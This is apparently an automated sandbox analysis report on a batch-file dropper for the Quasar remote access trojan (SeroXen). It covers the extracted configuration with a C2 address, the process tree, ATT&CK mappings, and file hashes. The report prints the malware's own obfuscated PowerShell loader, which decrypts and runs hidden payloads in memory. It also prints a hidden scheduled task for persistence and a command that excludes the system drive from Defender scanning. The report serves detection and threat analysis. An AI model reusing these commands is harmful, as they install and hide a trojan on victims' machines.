quasar | a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

General

Target

rename me.bat
Size

514KB
MD5

414264bb47935bed191128cf44f3a2cd
SHA1

df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256

a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512

c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
SSDEEP

12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

147.185.221.19:33587

Mutex

$Sxr-2rfrZTKITtK0P0zGYG

Attributes

encryption_key
Yr0YpBPNd3kXsl43jZMx
install_name
$sxr-sdinwn.exe
log_directory
$sxr
reconnect_delay
3000
startup_key
$sxr-metsha
subdirectory
sxr

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2144-195-0x0000000008F10000-0x0000000008F7E000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 2144 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe
Executes dropped EXE 1 IoCs

Processes:

$sxr-sdinwn.exe

pid process

2616 $sxr-sdinwn.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4928 schtasks.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4248 ipconfig.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings powershell.exe

flow	pid	process
2	2144	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	powershell.exe

pid	process
2616	$sxr-sdinwn.exe

flow	ioc
1	ip-api.com

pid	process
4928	schtasks.exe

pid	process
4248	ipconfig.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exe

pid	process
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
32	powershell.exe
32	powershell.exe
32	powershell.exe
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
2616	$sxr-sdinwn.exe
5004	powershell.exe
5004	powershell.exe
2616	$sxr-sdinwn.exe
5004	powershell.exe
2616	$sxr-sdinwn.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	32	powershell.exe
Token: SeIncreaseQuotaPrivilege	32	powershell.exe
Token: SeSecurityPrivilege	32	powershell.exe
Token: SeTakeOwnershipPrivilege	32	powershell.exe
Token: SeLoadDriverPrivilege	32	powershell.exe
Token: SeSystemProfilePrivilege	32	powershell.exe
Token: SeSystemtimePrivilege	32	powershell.exe
Token: SeProfSingleProcessPrivilege	32	powershell.exe
Token: SeIncBasePriorityPrivilege	32	powershell.exe
Token: SeCreatePagefilePrivilege	32	powershell.exe
Token: SeBackupPrivilege	32	powershell.exe
Token: SeRestorePrivilege	32	powershell.exe
Token: SeShutdownPrivilege	32	powershell.exe
Token: SeDebugPrivilege	32	powershell.exe
Token: SeSystemEnvironmentPrivilege	32	powershell.exe
Token: SeRemoteShutdownPrivilege	32	powershell.exe
Token: SeUndockPrivilege	32	powershell.exe
Token: SeManageVolumePrivilege	32	powershell.exe
Token: 33	32	powershell.exe
Token: 34	32	powershell.exe
Token: 35	32	powershell.exe
Token: 36	32	powershell.exe
Token: SeIncreaseQuotaPrivilege	32	powershell.exe
Token: SeSecurityPrivilege	32	powershell.exe
Token: SeTakeOwnershipPrivilege	32	powershell.exe
Token: SeLoadDriverPrivilege	32	powershell.exe
Token: SeSystemProfilePrivilege	32	powershell.exe
Token: SeSystemtimePrivilege	32	powershell.exe
Token: SeProfSingleProcessPrivilege	32	powershell.exe
Token: SeIncBasePriorityPrivilege	32	powershell.exe
Token: SeCreatePagefilePrivilege	32	powershell.exe
Token: SeBackupPrivilege	32	powershell.exe
Token: SeRestorePrivilege	32	powershell.exe
Token: SeShutdownPrivilege	32	powershell.exe
Token: SeDebugPrivilege	32	powershell.exe
Token: SeSystemEnvironmentPrivilege	32	powershell.exe
Token: SeRemoteShutdownPrivilege	32	powershell.exe
Token: SeUndockPrivilege	32	powershell.exe
Token: SeManageVolumePrivilege	32	powershell.exe
Token: 33	32	powershell.exe
Token: 34	32	powershell.exe
Token: 35	32	powershell.exe
Token: 36	32	powershell.exe
Token: SeIncreaseQuotaPrivilege	32	powershell.exe
Token: SeSecurityPrivilege	32	powershell.exe
Token: SeTakeOwnershipPrivilege	32	powershell.exe
Token: SeLoadDriverPrivilege	32	powershell.exe
Token: SeSystemProfilePrivilege	32	powershell.exe
Token: SeSystemtimePrivilege	32	powershell.exe
Token: SeProfSingleProcessPrivilege	32	powershell.exe
Token: SeIncBasePriorityPrivilege	32	powershell.exe
Token: SeCreatePagefilePrivilege	32	powershell.exe
Token: SeBackupPrivilege	32	powershell.exe
Token: SeRestorePrivilege	32	powershell.exe
Token: SeShutdownPrivilege	32	powershell.exe
Token: SeDebugPrivilege	32	powershell.exe
Token: SeSystemEnvironmentPrivilege	32	powershell.exe
Token: SeRemoteShutdownPrivilege	32	powershell.exe
Token: SeUndockPrivilege	32	powershell.exe
Token: SeManageVolumePrivilege	32	powershell.exe
Token: 33	32	powershell.exe
Token: 34	32	powershell.exe
Token: 35	32	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4240 wrote to memory of 4936	4240	cmd.exe	powershell.exe
PID 4240 wrote to memory of 4936	4240	cmd.exe	powershell.exe
PID 4240 wrote to memory of 4936	4240	cmd.exe	powershell.exe
PID 4936 wrote to memory of 32	4936	powershell.exe	powershell.exe
PID 4936 wrote to memory of 32	4936	powershell.exe	powershell.exe
PID 4936 wrote to memory of 32	4936	powershell.exe	powershell.exe
PID 4936 wrote to memory of 2968	4936	powershell.exe	WScript.exe
PID 4936 wrote to memory of 2968	4936	powershell.exe	WScript.exe
PID 4936 wrote to memory of 2968	4936	powershell.exe	WScript.exe
PID 2968 wrote to memory of 3156	2968	WScript.exe	cmd.exe
PID 2968 wrote to memory of 3156	2968	WScript.exe	cmd.exe
PID 2968 wrote to memory of 3156	2968	WScript.exe	cmd.exe
PID 3156 wrote to memory of 2144	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2144	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2144	3156	cmd.exe	powershell.exe
PID 2144 wrote to memory of 4928	2144	powershell.exe	schtasks.exe
PID 2144 wrote to memory of 4928	2144	powershell.exe	schtasks.exe
PID 2144 wrote to memory of 4928	2144	powershell.exe	schtasks.exe
PID 2144 wrote to memory of 2616	2144	powershell.exe	$sxr-sdinwn.exe
PID 2144 wrote to memory of 2616	2144	powershell.exe	$sxr-sdinwn.exe
PID 2144 wrote to memory of 2616	2144	powershell.exe	$sxr-sdinwn.exe
PID 2144 wrote to memory of 5004	2144	powershell.exe	powershell.exe
PID 2144 wrote to memory of 5004	2144	powershell.exe	powershell.exe
PID 2144 wrote to memory of 5004	2144	powershell.exe	powershell.exe
PID 2144 wrote to memory of 4248	2144	powershell.exe	ipconfig.exe
PID 2144 wrote to memory of 4248	2144	powershell.exe	ipconfig.exe
PID 2144 wrote to memory of 4248	2144	powershell.exe	ipconfig.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_806_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_806.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_806.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_806.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_806.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_806.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:4928

C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5004

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
6⤵
- Gathers network information
PID:4248

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Command and Scripting Interpreter

1

T1059

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
e085227e9c4daf9b7805ea75df49efcc

SHA1
9fed1eb524693c4dcb99d38e3d94e77d73716c8b

SHA256
f1bcecef924fadd06aabf96aecf26291d1e2ed3b1ee7e24ad89ac8c6ed376cdb

SHA512
a622f40d0e68d20236a1020c713dbc208069c2fbdb26be73cc78d484aabc9a8f0d5156a0ed8f6148c05e8b635c457f7c18220686ef1bf619b492995e78f3649f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
e6498f178b1860bbc7389d4d8187d561

SHA1
02a11d66d29a68764ab7e51c963f67ec76dce04b

SHA256
15d7ae8e1ef925970be9cbefb1555d09f8ae4a77f0d0119f1fe85ad4b61e9a46

SHA512
fa74ac1762af6fee08c339f46e91a9813960694ba78ed3fe3df54edf008b313d69475c2c47b37f0aad47c48341a74293d1fd0a598290ac615c8dbff533a6b80d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43kzohf1.fn5.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_806.bat
Filesize
514KB

MD5
414264bb47935bed191128cf44f3a2cd

SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130

SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_806.vbs
Filesize
115B

MD5
6d1392bb8bb22c98c9b386ef0475810b

SHA1
8e923691f6563f196e347117de16067693b59cfd

SHA256
b37a78325720924020973b3223ff4374cc96dfc0e5f243bec30eebf02a5999e9

SHA512
c76f221e4c9be62e611744e388b4e5f55c3d017a5a2fbe7be56aea69a40cf587e3bfb2441303f46b9c74685275dee074c63e74d49ad1f71d5b29acd03dc2e79a

Download Submit
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
Filesize
420KB

MD5
be8ffebe1c4b5e18a56101a3c0604ea0

SHA1
2ec8af7c1538974d64291845dcb02111b907770f

SHA256
d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

SHA512
71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

Download Submit
memory/32-62-0x0000000070BC0000-0x0000000070C0B000-memory.dmp

Filesize
300KB

Download
memory/32-69-0x00000000071B0000-0x00000000071C0000-memory.dmp

Filesize
64KB

Download
memory/32-68-0x00000000098D0000-0x0000000009975000-memory.dmp

Filesize
660KB

Download
memory/32-61-0x0000000009870000-0x00000000098A3000-memory.dmp

Filesize
204KB

Download
memory/32-60-0x000000007FD00000-0x000000007FD10000-memory.dmp

Filesize
64KB

Download
memory/32-42-0x0000000073EE0000-0x00000000745CE000-memory.dmp

Filesize
6.9MB

Download
memory/32-43-0x00000000071B0000-0x00000000071C0000-memory.dmp

Filesize
64KB

Download
memory/32-163-0x0000000073EE0000-0x00000000745CE000-memory.dmp

Filesize
6.9MB

Download
memory/32-155-0x00000000071B0000-0x00000000071C0000-memory.dmp

Filesize
64KB

Download
memory/32-70-0x0000000009B80000-0x0000000009C14000-memory.dmp

Filesize
592KB

Download
memory/32-63-0x0000000009830000-0x000000000984E000-memory.dmp

Filesize
120KB

Download
memory/2144-195-0x0000000008F10000-0x0000000008F7E000-memory.dmp

Filesize
440KB

Download
memory/2144-196-0x00000000090C0000-0x0000000009152000-memory.dmp

Filesize
584KB

Download
memory/2144-199-0x00000000069C0000-0x00000000069D2000-memory.dmp

Filesize
72KB

Download
memory/2144-200-0x0000000009060000-0x000000000909E000-memory.dmp

Filesize
248KB

Download
memory/2616-266-0x00000000083F0000-0x000000000842C000-memory.dmp

Filesize
240KB

Download
memory/4936-32-0x000000000B730000-0x000000000BC2E000-memory.dmp

Filesize
5.0MB

Download
memory/4936-23-0x0000000007300000-0x0000000007310000-memory.dmp

Filesize
64KB

Download
memory/4936-10-0x0000000008090000-0x00000000080AC000-memory.dmp

Filesize
112KB

Download
memory/4936-31-0x00000000098D0000-0x0000000009932000-memory.dmp

Filesize
392KB

Download
memory/4936-30-0x0000000004FD0000-0x0000000004FD8000-memory.dmp

Filesize
32KB

Download
memory/4936-29-0x0000000009830000-0x000000000984A000-memory.dmp

Filesize
104KB

Download
memory/4936-6-0x00000000077F0000-0x0000000007812000-memory.dmp

Filesize
136KB

Download
memory/4936-8-0x0000000008130000-0x0000000008196000-memory.dmp

Filesize
408KB

Download
memory/4936-7-0x00000000080C0000-0x0000000008126000-memory.dmp

Filesize
408KB

Download
memory/4936-5-0x0000000007940000-0x0000000007F68000-memory.dmp

Filesize
6.2MB

Download
memory/4936-28-0x000000000A0B0000-0x000000000A728000-memory.dmp

Filesize
6.5MB

Download
memory/4936-2-0x00000000050C0000-0x00000000050F6000-memory.dmp

Filesize
216KB

Download
memory/4936-198-0x0000000073EE0000-0x00000000745CE000-memory.dmp

Filesize
6.9MB

Download
memory/4936-9-0x00000000081A0000-0x00000000084F0000-memory.dmp

Filesize
3.3MB

Download
memory/4936-12-0x0000000008890000-0x0000000008906000-memory.dmp

Filesize
472KB

Download
memory/4936-4-0x0000000007300000-0x0000000007310000-memory.dmp

Filesize
64KB

Download
memory/4936-11-0x0000000008630000-0x000000000867B000-memory.dmp

Filesize
300KB

Download
memory/4936-3-0x0000000073EE0000-0x00000000745CE000-memory.dmp

Filesize
6.9MB

Download
memory/5004-286-0x0000000070BC0000-0x0000000070C0B000-memory.dmp

Filesize
300KB

Download
memory/5004-291-0x0000000009870000-0x0000000009915000-memory.dmp

Filesize
660KB

Download
memory/5004-488-0x00000000099E0000-0x00000000099FA000-memory.dmp

Filesize
104KB

Download
memory/5004-493-0x00000000099D0000-0x00000000099D8000-memory.dmp

Filesize
32KB

Download
memory/5004-277-0x00000000092E0000-0x0000000009302000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads